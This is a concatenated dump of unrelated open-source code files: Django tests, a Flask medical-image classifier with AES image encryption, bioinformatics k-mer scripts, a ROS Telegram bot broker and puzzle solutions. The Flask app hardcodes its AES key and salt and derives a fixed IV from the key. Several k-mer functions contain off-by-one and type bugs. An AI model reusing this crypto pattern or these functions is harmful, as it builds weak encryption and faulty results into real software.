date=\"2022-06-17\",\n checkin_time=\"10:07:46\",\n checkout_time=\"18:41:08\",\n ttl_work_time=\"08:33:22\"\n )\n Attendence.objects.create(\n user=self.user,\n date=\"2022-06-16\",\n checkin_time=\"10:07:46\",\n checkout_time=\"17:41:08\",\n ttl_work_time=\"07:33:22\"\n )\n\n def test_attendence_dates(self):\n self.assertSequenceEqual(\n Attendence.objects.dates('date', \"year\"),\n [\n date(2022, 1, 1)\n ]\n )\n\n self.assertSequenceEqual(\n Attendence.objects.dates(\"date\", \"month\"),\n [\n date(2022, 6, 1)\n ]\n )\n self.assertSequenceEqual(\n Attendence.objects.dates(\"date\", \"day\"),\n [\n date(2022, 6, 16),\n date(2022, 6, 17)\n ]\n )\n\n def test_attendence_dates_fails_when_given_invalid_field_argument(self):\n with self.assertRaisesMessage(\n FieldError,\n 'Cannot resolve keyword \"invalid_field\" into field.'\n ):\n Attendence.objects.dates('invalid_field', 'year')\n\n def test_attendence_dates_fails_when_given_invalid_kind_argument(self):\n\n with self.assertRaisesMessage(ValueError, \" 'kind' must be of 'year','month','day' \"):\n Attendence.objects.dates('date', 'bad_kind')\n\n\n","repo_name":"HarshitChandani/zoho-clone","sub_path":"zoho/clone/tests/models/attendence.py","file_name":"attendence.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13436137060","text":"import os\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom PIL import Image\r\nimport cv2\r\nfrom tensorflow.keras.models import load_model\r\nfrom flask import Flask, request, render_template\r\nfrom werkzeug.utils import secure_filename\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport sys\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Util.Padding import pad, unpad\r\nfrom Crypto.Random import get_random_bytes\r\nfrom Crypto.Protocol.KDF import PBKDF2\r\nfrom Crypto.Hash import SHA256\r\n\r\nkeyInput = \"MySecretKey123\"\r\nsalt = b'MyFixedSalt123'\r\nkeySize = 16\r\nivSize = AES.block_size\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nmodel = load_model('brain_tumor_classification_VGG16.h5')\r\n
model1 = load_model('brain21.h5')  # first-stage model used by getResult(); leaving this commented out left model1 undefined\r\n\r\ndef get_className(classNo1):\r\n if classNo1 == 1:\r\n return \"Brain tumor\"\r\n elif classNo1 == 2:\r\n return \"Not a brain tumor\"\r\n elif classNo1 == 3:\r\n return \"Not a brain image\"\r\n \r\n \r\ndef encrypt(file_path):\r\n \r\n\r\n start_time = time.time()\r\n \r\n imageOrig = cv2.imread(file_path)\r\n rowOrig, columnOrig, depthOrig = imageOrig.shape\r\n\r\n minWidth = (AES.block_size + AES.block_size) // depthOrig + 1\r\n if columnOrig < minWidth:\r\n print('The minimum width of the image must be {} pixels, so that IV and padding can be stored in a single additional row!'.format(minWidth))\r\n sys.exit()\r\n\r\n imageOrigBytes = imageOrig.tobytes()\r\n \r\n key = PBKDF2(keyInput, salt, dkLen=16)\r\n\r\n hash_obj = SHA256.new(key)\r\n iv = hash_obj.digest()[:ivSize]\r\n\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n imageOrigBytesPadded = pad(imageOrigBytes, AES.block_size)\r\n ciphertext = cipher.encrypt(imageOrigBytesPadded)\r\n\r\n paddedSize = len(imageOrigBytesPadded) - len(imageOrigBytes)\r\n void = columnOrig * depthOrig - ivSize - paddedSize\r\n ivCiphertextVoid = iv + ciphertext + bytes(void)\r\n imageEncrypted = np.frombuffer(ivCiphertextVoid, dtype=imageOrig.dtype).reshape(rowOrig + 1, columnOrig, depthOrig)\r\n\r\n cv2.imwrite(file_path, imageEncrypted)\r\n cv2.destroyAllWindows()\r\n\r\ndef decrypt(file_path):\r\n\r\n key = PBKDF2(keyInput, salt, dkLen=16)\r\n \r\n hash_obj = SHA256.new(key)\r\n iv = hash_obj.digest()[:ivSize]\r\n \r\n imageEncrypted = cv2.imread(file_path)\r\n \r\n rowEncrypted, columnOrig, depthOrig = imageEncrypted.shape\r\n rowOrig = rowEncrypted - 1\r\n encryptedBytes = imageEncrypted.tobytes()\r\n iv = encryptedBytes[:ivSize]  # the IV stored in the extra image row replaces the derived one\r\n imageOrigBytesSize = rowOrig * columnOrig * depthOrig\r\n paddedSize = (imageOrigBytesSize // AES.block_size + 1) * AES.block_size - imageOrigBytesSize\r\n encrypted = encryptedBytes[ivSize: ivSize + imageOrigBytesSize + paddedSize]\r\n \r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n decryptedImageBytesPadded = cipher.decrypt(encrypted)\r\n decryptedImageBytes = unpad(decryptedImageBytesPadded, AES.block_size)\r\n \r\n decryptedImage = np.frombuffer(decryptedImageBytes, imageEncrypted.dtype).reshape(rowOrig, columnOrig, depthOrig)\r\n\r\n cv2.imwrite(\"decrypted_image.png\", decryptedImage)\r\n cv2.destroyAllWindows()\r\n return decryptedImage\r\n\r\n\r\ndef getResult(img):\r\n # image = cv2.imread(img)\r\n image = decrypt(img)\r\n image = Image.fromarray(image, 'RGB')\r\n image = image.resize((224, 224))\r\n image = np.array(image)\r\n input_img = np.expand_dims(image, axis=0)\r\n predict_x = model1.predict(input_img)\r\n result = np.argmax(predict_x, axis=1)\r\n print(result)\r\n if result == 0:\r\n predict_y = model.predict(input_img)\r\n output = np.argmax(predict_y, axis=1)\r\n print(output)\r\n if output == 1:\r\n return 1\r\n else:\r\n return 2\r\n else:\r\n return 3\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef upload():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n basepath = os.path.dirname(__file__)\r\n \r\n filename=\"gfgfhf.png\"\r\n file_path = os.path.join(basepath, 'uploads', filename)\r\n f.save(file_path)\r\n encrypt(file_path)\r\n \r\n value = getResult(file_path)\r\n \r\n res = get_className(value)\r\n return res\r\n\r\n else:\r\n return None  # a GET carries no uploaded file, so there is no file_path to score\r\n\r\nif __name__ == '__main__':\r\n
app.run(port=3000, debug=False)","repo_name":"greeksachdeva/AES-IMAGE-PYTHON","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35588833196","text":"from collections import deque\n \ndef solution(places):\n \n def bfs(x,y,graph):\n visit = [[0]*5 for _ in range(5)]\n visit[x][y] = 0\n dx = [1,0,-1,0]\n dy = [0,1,0,-1]\n q = deque([(x,y)]) \n\n while q:\n x,y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx<5 and 0<=ny<5 and not visit[nx][ny] and graph[nx][ny] != 'X':\n visit[nx][ny] = visit[x][y] + 1 # the traversed distance is the Manhattan distance!\n q.append((nx,ny))\n\n return visit # return the traversed distances\n\n answer = []\n n = 5\n for graph in places:\n plist = []\n for i in range(n):\n for j in range(n):\n if graph[i][j] == 'P': # record the positions of every P\n plist.append((i,j)) \n \n isTrue = True # whether distancing is satisfied\n for i in range(len(plist)): # for each P\n if isTrue: \n for j in range(i+1,len(plist)): # get the Manhattan distance to the remaining Ps\n x,y = plist[i]\n x2,y2 = plist[j]\n result = bfs(x,y,graph)\n if 1<=result[x2][y2]<=2: # if any remaining P is at Manhattan distance 1 to 2, distancing fails (0 means it was completely blocked off, so the condition is satisfied)\n isTrue = False\n break\n else: # as soon as distancing is violated once\n break \n\n if isTrue:\n answer.append(1)\n else:\n answer.append(0)\n \n return answer","repo_name":"agilestar8/coding-test-","sub_path":"프로그래머스 lv2/거리두기 확인하기.py","file_name":"거리두기 확인하기.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39577309536","text":"\"\"\"\nTests for :mod:`ranger-ims-server.ext.klein`\n\"\"\"\n\nfrom klein import KleinRenderable\nfrom klein.test.test_resource import Klein, MockRequest\nfrom twisted.web.iweb import IRequest\n\nfrom ..klein import static\nfrom ..trial import TestCase\n\n\n__all__ = ()\n\n\nclass StaticDecoratorTests(TestCase):\n \"\"\"\n Tests for :func:`static`\n \"\"\"\n\n class Application:\n router = Klein()\n\n hello = \"Hello\"\n\n @router.route(\"/\")\n @static\n def root(self, request: IRequest) -> KleinRenderable:\n return self.hello\n\n def test_static_entity(self) -> None:\n \"\"\"\n :func:`static` returns the entity returned by the wrapped method.\n \"\"\"\n app = self.Application()\n request = MockRequest(b\"/\")\n\n entity = app.root(request)\n\n self.assertIdentical(entity, app.hello)\n\n def test_static_etag(self) -> None:\n \"\"\"\n :func:`static` sets an ``ETag`` header.\n \"\"\"\n app = self.Application()\n request = MockRequest(b\"/\")\n\n app.root(request)\n\n etags = request.responseHeaders.getRawHeaders(\"etag\")\n self.assertTrue(len(etags) == 1, etags)\n etag = etags[0]\n self.assertTrue(etag)\n\n def test_static_cacheControl(self) -> None:\n \"\"\"\n :func:`static` sets a ``Cache-Control`` header.\n \"\"\"\n app = self.Application()\n request = MockRequest(b\"/\")\n\n app.root(request)\n\n etags = request.responseHeaders.getRawHeaders(\"cache-control\")\n self.assertTrue(len(etags) == 1, etags)\n etag = etags[0]\n self.assertTrue(etag)\n","repo_name":"burningmantech/ranger-ims-server","sub_path":"src/ims/ext/test/test_klein.py","file_name":"test_klein.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"10035665020","text":"# region CHARGING STATION: The Frequency Array\nimport itertools\n# counts how many times a certain pattern is observed in the sequence\ndef
pattern_count(text, pattern):\n count = 0\n for i in range(0, len(text) - len(pattern) + 1):\n if text[i : len(pattern) + i] == pattern:\n count += 1\n return count\n\n\ntext1 = \"GACCATCAAAACTGATAAACTACTTAAAAATCAGT\"\npattern1 = \"AAA\"\n#print (pattern_count(text1, pattern1))\n\n#FrequentWords is shown below.,http://ideone.com/fork/A2kahh\n#https://ideone.com/fork/LrznON\ndef frequentwords(text, k):\n frequentpatterns, count = [], []\n for i in range(len(text) - k + 1):\n count.append(pattern_count(text, text[i:i+k]))\n maxCount = max(count)\n for i in range(len(count)):\n if count[i] == maxCount:\n frequentpatterns.append(text[i:i+k])\n return set(frequentpatterns)\ntext= \"CGCCTAAATAGCCTCGCGGAGCCTTATGTCATACTCGTCCT\"\nk= 3\n\n#print(frequentwords(text, k))\n\n#function to reverse complement of the string\ndef reversecomplement(text):\n base = ['A', 'C', 'G', 'T']\n # print (list(reversed(base)))\n #print((base.index('C')))\n #print(list(reversed(base))[base.index('C')])\n result = [list(reversed(base))[base.index(ch)] for ch in reversed(text)]\n return ''.join(result)\n\ntext2='CCAGATC'\n\n\nf = open('myfile','w')\nf.write(reversecomplement(text2)) # python will convert \\n to os.linesep\nf.close() # you can omit in most cases as the destructor will call it\n#print (reversecomplement(text2))\n\n\n#pattern matching, all positions where the pattern starts\ndef substr(pattern, genome):\n k, result = len(pattern), []\n for i in range(len(genome) - k + 1):\n if genome[i:i+k] == pattern:\n result.append(i)\n #import string\n #string.join( result, '(*)' )\n return result\n\npattern ='CTTGATCAT'\ngenome ='aa'\n#print(*substr(pattern, genome), sep=' ')\n\ndef patterntonumber(pattern):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=len(pattern))]\n return patterns.index(pattern)\n\ndef numbertopattern(number, k):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=k)]\n return patterns[number]\n\ndef findclump(genome1, k, l, t):\n result = set()\n for i in range(len(genome1) - l + 1):\n wordsrange = range(l - k + 1)\n index, count = [patterntonumber(genome1[i+j:i+j+k]) for j in wordsrange], [1 for j in wordsrange]\n index.sort()\n for j in range(1, l - k + 1):\n if index[j] == index[j - 1]:\n count[j] = count[j - 1] + 1\n for j in wordsrange:\n if count[j] >= t:\n result.add(numbertopattern(index[j], k))\n return result\n\ndef ClumpFinding(Text, k, L, t):\n \"\"\"Clump Finding Problem: Find patterns forming clumps in a string.\n Input: A string Genome, and integers k (frequent k-mers), L (cluster/clumps length), and t (time/count).\n Output: All distinct k-mers forming (L, t)-clumps in Genome.\n \"\"\"\n FrequentPatterns=[]\n for n in range (0,(len(Text)-L)):\n Text_L=Text[n:(n+L)]\n for i in range(0,(len(Text_L)-k)):\n Pattern = Text[i:(i+k)]\n count=PatternCount(Text_L, Pattern)\n if count == t:\n FrequentPatterns.append(Text[i:(i+k)]) #add Text(i, k) to FrequentPatterns\n FrequentPatterns=list(set(FrequentPatterns)) #remove duplicates from FrequentPatterns\n return FrequentPatterns\n\n\ndef PatternCount(Text, Pattern):\n \"\"\"\"The pattern of the motif for the mismatches,\n The input Text is a string and Pattern is also a string\n \"\"\"\n count= 0\n for i in range (0,(len(Text)-len(Pattern))):\n if Text[i:(i+len(Pattern))] == Pattern:\n count=count+1\n return count\n\n#example\nText=\"yyyyyyyyyyyyyyy\"\n\nk=10\nL=514\nt=20\nprint (ClumpFinding(Text, k, L, 
t))\n\ngenome1='CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA'\nk=5\nl=50\nt=4\nprint( findclump(genome1, k, l, t))\n\ngenome2='tttttttttttttttttttttTTTTTTTTTTTT'\nk=10\nl=579\nt=17\nprint( findclump(genome2, k, l, t))\n\n\n# region CHARGING STATION: Finding Frequent Words by Sorting\n#http://codereview.stackexchange.com/questions/37932/genome-string-clump-finding-problem\n# region CHARGING STATION: Solving the Clump Finding Problem\n# region CHARGING STATION: The Frequency Array\nimport itertools\n\n\ndef patterntonumber(pattern):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=len(pattern))]\n return patterns.index(pattern)\n\nprint(patterntonumber('ATGCAA'))\n\ndef numbertopattern(number, k):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=k)]\n return patterns[number]\n\ndef computefrequency(text, k):\n result = [0 for i in range(4 ** k)]\n for i in range(len(text) - k + 1):\n result[patterntonumber(text[i:i+k])] += 1\n return result\n\n\ndef fasterfrequentwords(text, k):\n frequentpatterns, frequencyarray = [], computefrequency(text, k)\n maxCount = max(frequencyarray)\n for i in range(4 ** k - 1):\n if frequencyarray[i] == maxCount:\n frequentpatterns.append(text[i:i+k])\n return frequentpatterns\n\ndef betterclumpfinding(genome, k, l, t):\n result, clump = set(), [0 for i in range(4 ** k)]\n frequencyarray = computefrequency(genome[:l], k)\n for i in range(4 ** k):\n if frequencyarray[i] >= t:\n clump[i] = 1\n for i in range(1, len(genome) - l + 1):\n frequencyarray[patterntonumber(genome[i-1:i+k-1])] -= 1\n j = patterntonumber(genome[i+l-k:i+l])\n frequencyarray[j] += 1\n if frequencyarray[j] >= t:\n clump[j] = 1\n for i in range(4 ** k):\n if clump[i] == 1:\n result.add(numbertopattern(i, k))\n return result\n# endregion\n\n#betterclumpfinding(genome, k, l, t)\ngenome3='CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA'\nk3=5\nl3=50\nt3=4\nprint(betterclumpfinding(genome3, k3, l3, t3))\n\nprint('i do not know555')\n\nimport math\nimport numpy\n#genome='CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA'\n#k=5\n#L=50\n#t=4\ndef betterClumpFinding(genome,k,L,t):\n frequentPatterns = []\n clump = numpy.zeros( math.pow(4,k), dtype=numpy.int )\n text = genome[0:L]\n frequencyArray = computingFrequencies(text,k)\n for i in range(len(clump)):\n if frequencyArray[i] >= t:\n clump[i] = 1\n for i in range(1,len(genome)-L+1):\n firstPattern = genome[i-1:i-1+k]\n j = patternToNumber(firstPattern)\n frequencyArray[j] -= 1\n lastPattern = genome[i+L-k:i+L]\n j = patternToNumber(lastPattern)\n frequencyArray[j] += 1\n if frequencyArray[j] >= t:\n clump[j] = 1\n for i in range(len(clump)):\n if clump[i] == 1:\n pattern = numberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns\n\ndef testClumpFinding():\n f = open(\"file1\", r)\n lines = f.readlines()\n genome = lines[0].rstrip()\n k,L,t = map(int,lines[1].rstrip().split(\" \"))\n output = betterClumpFinding(genome,k,L,t)\n print(\" \".join(map(str, output)))\n\ndef computingFrequencies(text, k):\n frequencyArray = numpy.zeros( math.pow(4,k), dtype=numpy.int )\n for i in range(len(text)-k+1):\n pattern = text[i:i+k]\n j = patternToNumber(pattern)\n frequencyArray[j] += 1\n\n return frequencyArray\n\ndef patternToNumber(pattern):\n if len(pattern) == 0:\n return 0\n prefix = pattern[:-1]\n symbol = pattern[-1:]\n return 4*patternToNumber(prefix) + symbolToNumber(symbol)\n\ndef 
symbolToNumber(symbol):\n return {\n 'A':0,\n 'C':1,\n 'G':2,\n 'T':3\n }[symbol]\n\ndef numberToPattern(number,k):\n if k == 1:\n return numberToSymbol(number)\n quotient, remainder = divmod(number,4)\n prefixPattern = numberToPattern(quotient,k-1)\n symbol = numberToSymbol(remainder)\n return prefixPattern+symbol\n\ndef numberToSymbol(number):\n return {\n 0:'A',\n 1:'C',\n 2:'G',\n 3:'T'\n }[number]\n\npattern ='ATGCAA'\n\nprint(patternToNumber(pattern))\n\nseq = 'ACGTTGCATGTCGCATGATGCATGAGAGCT'\nn = 4\nk = 1\ndef countKmers(seq,n,k):\n kmers={}\n kfinals={}\n for i in range(len(seq)-k+1):\n kmer=seq[i:(i+k)]\n if kmer in kmers:  # dict.has_key() is Python 2 only\n kmers[kmer]+=1\n else:\n kmers[kmer]=1\n for i in kmers.keys():\n if(kmers[i]>=n):\n kfinals[i]=kmers[i]\n return kfinals\nprint (countKmers(seq,n,k))\n","repo_name":"TatyanaV/Finding-Hidden-Messages-in-DNA-Bioinformatics-I--and-Genomic-Data-Science-and-Clustering-V-","sub_path":"count1.py","file_name":"count1.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17968921521","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('login', views.user_login, name=\"login\"),\n path('', views.home, name=\"home\"),\n path('register', views.register, name=\"register\"),\n path('create', views.create, name=\"create\"),\n path('navbar', views.navbar, name=\"navbar\"),\n path('logout', views.user_logout, name=\"logout\"),\n path('completed/', views.completed, name=\"completed\"),\n path('read/', views.read, name=\"read\"),\n]\n","repo_name":"gagansingh3785/Tasks","sub_path":"tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40156988398","text":"\"\"\"\ntask_2_2\nAn exercise to reinforce knowledge of the json module. There is an orders file in JSON format\n with information about orders.
Write a script that automates filling it with data.\n\"\"\"\n\nimport json\nfrom pprint import pprint\n\n\ndef write_order_to_json(file, order):\n with open(file, encoding='utf-8') as f_read:\n content = f_read.read()\n my_orders = json.loads(content)\n my_orders['orders'].append(order)\n\n with open(file, 'w', encoding='utf-8') as f_write:\n my_orders_as_string = json.dumps(my_orders, sort_keys=True, indent=4, ensure_ascii=False)\n f_write.write(my_orders_as_string)\n\n # with open(file, 'w', encoding='utf-8') as f_write:\n # json.dump(my_orders, f_write, sort_keys=True, indent=4, ensure_ascii=False)\n\n with open(file, 'r', encoding='UTF-8') as f_check:\n content_check = json.load(f_check)\n pprint(content_check)\n\n\nif __name__ == '__main__':\n my_file = 'orders.json'\n order_1 = {\n 'item': 'mobile_phone',\n 'quantity': 5,\n 'price': 215.99,\n 'buyer': 'Conor McGregor',\n 'date': '01.01.2022'\n }\n order_2 = {\n 'item': 'tablet',\n 'quantity': 2,\n 'price': 775.99,\n 'buyer': 'Andy McMagadan',\n 'date': '10.01.2022'\n }\n\n write_order_to_json(my_file, order_1)\n write_order_to_json(my_file, order_2)\n","repo_name":"AndyMcMagadan/client_server_apps","sub_path":"hw_2_2.py","file_name":"hw_2_2.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6357654922","text":"#!/usr/bin/env python \n\n#########################################################################\n# _________ ___________ ___________ ____ ____ ___________ #\n# / _____/ \\__ ___/ \\_ _____/ \\ \\ / / \\_ _____/ #\n# \\_____ \\ | | | __)_ \\ Y / | __)_ #\n# / \\ | | | \\ \\ / | \\ #\n# /_______ / /\\ |____| /\\ /_______ / /\\ \\___/ /\\ /_______ / /\\ #\n# \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ #\n# #\n#########################################################################\n# #\n# File Name: telegram_broker.py #\n# #\n# Maintainer: vinu #\n# #\n# Version: v1.0.2 (alpha) #\n# #\n# Notes: Version with functional telegram messaging, publish menu messa-#\n# ges & receive instructions from telegram.
Added ubidots pub and#\n# some bug to fix later #\n# #\n# Latest edit: vinu #\n# #\n# Date: 13.11.2022 #\n#########################################################################\n\nfrom os import wait\nimport rospy \nimport time\n#Import Datatypes\nfrom std_msgs.msg import String\n\n#Clase para comunicarse con telegram\nclass TelegramComm(): \n def __init__(self): \n rospy.on_shutdown(self.cleanup) #Definir fucnion de cierre\n self.pub_tele = rospy.Publisher('pub_Telegram', String, queue_size=1) #Publish data to telegram\n self.pub_inst = rospy.Publisher('instr_tb', String, queue_size=1) #Publish Instructions to tb node\n self.pub_ubid = rospy.Publisher('ubidots', String, queue_size=1) #Publish Instructions to tb node\n rospy.Subscriber(\"state_tb\", String, self.state_tb_callback) #Subscribe to tb state info\n rospy.Subscriber(\"sub_Telegram\", String, self.tlgrm_callback) #Subscribe to telegram instructions\n #********** INIT NODE **********### \n r = rospy.Rate(2) #1Hz \n print(\"Node initialized 2hz\")\n #Init variables\n self.state = 0 #State recieved variable\n self.tlgrm_msg = '' #Telegram mesage empty variable\n op = '' #Empty option variable\n sent_menu1 = 0 #Menu1 flag\n menu1 = 10 #Menu1 option\n self.msg_flag = 0 #Telegram message flag\n nc_msg = 0 #NC robot flag\n resp_1 = 0 #Firts answe flag\n sent_menu2 = 0 #Menu2 flag\n posFile = '/home/vinu/catkin_ws/src/scf_reto/maps_tb/goals.txt' #Define psoitions file\n print('Initializing...')\n time.sleep(3)\n #While loop\n while not rospy.is_shutdown():\n print(\"\"\"--Telegram Broker v1.0.2--\n Developed by S.T.E.V.E for SCF\n Running...\n Publishing to /pub_Telegram & /inst_tb & /ubidots\n subscribed to /state_tb & /sub_Telegram\n \"\"\")\n #self.pub_tele.publish(\"Robot not conected\")\n #Resend Menu\n if self.tlgrm_msg in ['Menu','menu']: #If message in list\n sent_menu1 = 0 #Clear menu 1 flag\n sent_menu2 = 0 #Clear menu 2 flag\n self.msg_flag = 0 #Clear Tlgrm meg flag\n resp_1 = 0 #Clear Answer flag\n self.tlgrm_msg = '' #Clear telegram msg\n print('Displayig menu, again...')\n #First Selection\n if self.msg_flag and not nc_msg: #If msg flag and robot conected\n if resp_1 == 0: #Check first answer flag\n op = self.tlgrm_msg #Save instruction\n if op in ['0', 'D', 'd']: #if instruction in list\n menu1 = 0 #Save instruction\n resp_1 = 1 #First answer flag\n elif op in ['1','M','m']: #If inst in list\n menu1 = 1 #Save inst\n resp_1 = 1 #First answer flag\n else:\n menu1 = 10 #If selection invalid reset menu1\n self.tlgrm_msg = '' #Empty telegram msg\n\n if menu1 == 0: #Use op instruction\n print('definir puntos')\n if sent_menu2 == 0: #Sent menu 2 flag check\n #Open position file and read lines\n with open(posFile, 'r') as f:\n lines = f.read()\n print(lines)\n #Publish positions in telegram DEFINIR PUNTOS\n # + code for ubidots publish\n self.pub_tele.publish('Las posiciones guardads son:')\n print('processing...')\n time.sleep(1)\n self.pub_tele.publish(lines)\n time.sleep(1)\n self.pub_tele.publish(\"\"\"Escribir una posicion en el formato:\n[Nombre]:[X-coord],[Y-coord],[Angulo]\"\"\")\n\n sent_menu2 = 1 #Sent menu2 flag\n time.sleep(1)\n print('ubidots publish')\n self.pub_ubid.publish('D'+lines)\n print('ubidots publish f')\n\n ans = self.tlgrm_msg #Save msg as ans\n if ans.count(',')==2 and ans.count(':') == 1: #Validate ans format\n #name:x-coord,y-coord,yaw\n print('Writing new point')\n #open position file and write new line\n with open(posFile, 'a') as f:\n f.write(ans+ '\\n')\n self.pub_tele.publish('Pose guardada') 
#Publish mesage in telegram\n sent_menu2 = 0 #Reset menu2 flag\n sent_menu1 = 0 #Reset Menu1 flag\n op = '' #Clear op var\n menu1 = 10 #Reset menu1 var\n self.msg_flag = 0 #Clear msg recieved flag\n elif ans != '': #Check for empty answer\n sent_menu2 = 0 #Resend menu2\n self.tlgrm_msg = '' #Empty telegram message\n \n elif menu1 == 1: #Menu option 1\n print('Moverse')\n if sent_menu2 == 0: #Check if menu2 sent\n #Open position file\n with open(posFile, 'r') as f:\n lines = f.read()\n print(lines)\n #Publish Positions in telegram\n # + code for ubidots publish\n self.pub_tele.publish('Escribir el nombre de una de las posiciones guardadas:')\n print('processing...')\n time.sleep(1)\n self.pub_tele.publish(lines)\n time.sleep(1)\n self.pub_ubid.publish('M'+lines)\n self.tlgrm_msg = '' #Clear telegram Message\n sent_menu2 = 1 #Sent menu1 flag raised\n ans = self.tlgrm_msg #Save msg as ans\n if lines.find(ans) != -1 and ans !='': #If ans exixts and dif from empty\n time.sleep(1)\n print('Sending goal to brain')\n self.pub_inst.publish('1'+ans) #Publish goal to brain\n print('Sent goal to brain') \n time.sleep(3)\n sent_menu2 = 0 #Clear menu2 flag\n sent_menu1 = 0 #Clear menu1 flag\n op = '' #Clear op\n menu1 = 10 #Reset menu1 value\n self.msg_flag = 0 #Reset msg flag\n print('Objetivo enviado correctamente...')\n \n \n #Display Menu\n else:\n #Send first menu if robot conected\n if sent_menu1 == 0: #Check menu sent flag\n if self.state == 0: #Check robot state\n #Send Menu Message\n self.pub_tele.publish('\\U0001F7E9 MENU PRINCIPAL \\U0001F7E9 ')\n time.sleep(1)\n print('Idle Message')\n self.pub_ubid.publish(\"menu01\")\n time.sleep(1)\n self.pub_tele.publish(\"\"\"Opciones a realizar:\n[0] o [D] Definir puntos \\u26F3\\uFE0F\n[1] o [M] Moverse a un punto \\U0001F6F9\n[2] o [P] Parar el Robot \\U0001F6A8\"\"\")\n nc_msg = 0 #Reset not conected flag\n else:\n print('nc_robot')\n self.pub_tele.publish(\"Robot not conected\")\n time.sleep(1)\n self.pub_ubid.publish(\"NC_robot\")\n nc_msg = 1 #Raise nc flag\n sent_menu1 = 1 #Raise sent menu\n\n #Send Menu 1 if reconected bot\n if nc_msg and not self.state: #if nc flag raised but state is 0\n sent_menu1 = 0 #Resend menu\n \n r.sleep() #r sleep for while loop\n\n #Telegram Instruction Arrival\n def tlgrm_callback(self, msg_string):\n self.tlgrm_msg = msg_string.data #Save incoming sting\n print(\"Recieved \" + self.tlgrm_msg) \n self.msg_flag = 1 #Raice msg recieved flag\n if self.tlgrm_msg in ['2','P','p','paro','parar','stop']: #Check if stop signal\n self.pub_inst.publish('2') #Publish stop\n self.tlgrm_msg = '' #Clear msg\n self.pub_tele.publish('Se ha enviado un PARO')\n self.msg_flag = 0 #Reset msg flag\n # Telegram State Arrival\n def state_tb_callback(self, msg_string):\n self.state = int(msg_string.data)\n #Recive state from robot\n\n def cleanup(self): \n #End the function\n #kill the node\n \n print(\"---------------xxxxx-------------------Ded\")\n print(\" __\")\n print(\" w c(..)o (\")\n print(\" \\__(-) __)\")\n print(\" /\\ (\")\n print(\" /(_)___)\")\n print(\" w /|\")\n print(\" | |\")\n print(\"Vinu m m\") \n############################### MAIN PROGRAM #################################### \nif __name__ == \"__main__\": \n rospy.init_node(\"telegram_broker\", anonymous=True) \n 
TelegramComm()","repo_name":"RafaelV1nueza/SCF_ii","sub_path":"scripts/telegram_broker.py","file_name":"telegram_broker.py","file_ext":"py","file_size_in_byte":11630,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22106983598","text":"import pytest\nfrom fatcat_openapi_client.rest import ApiException\n\nfrom fatcat_tools import authenticated_api, public_api\n\n\ndef test_authenticated_api():\n api = authenticated_api(\"http://localhost:9411/v0\")\n api.get_changelog()\n api.auth_check()\n\n\ndef test_public_api():\n api = public_api(\"http://localhost:9411/v0\")\n api.get_changelog()\n with pytest.raises(ApiException):\n api.auth_check()\n","repo_name":"internetarchive/fatcat","sub_path":"python/tests/tools_api.py","file_name":"tools_api.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"29313189627","text":"class Solution(object):\n def combinationSum4(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n\n return self.combinationRecBacktracking(nums, target)\n dp_array=[-1 for i in range(target+1)]\n dp_array[0]=1\n print(dp_array)\n return self.combinationRecDP(nums, target, dp_array)\n\n def combinationRecBacktracking(self, nums, target):\n \tprint(nums, target)\n \tif target==0:\n \t\treturn 1\n\n \tres=0\n \tfor i in range(len(nums)):\n \t\tif target-nums[i]>=0:\n \t\t res+=self.combinationRecBacktracking(nums, target-nums[i])\n \t\t print(\"res--\"+str(res))\n\n \treturn res\n\n def combinationRecDP(self, nums, target, dp_array):\n \tif dp_array[target]!= -1:\n \t\treturn dp_array[target]\n\n \tresult=0\n \tfor i in range(len(nums)):\n \t\tif target-nums[i]>=0:\n 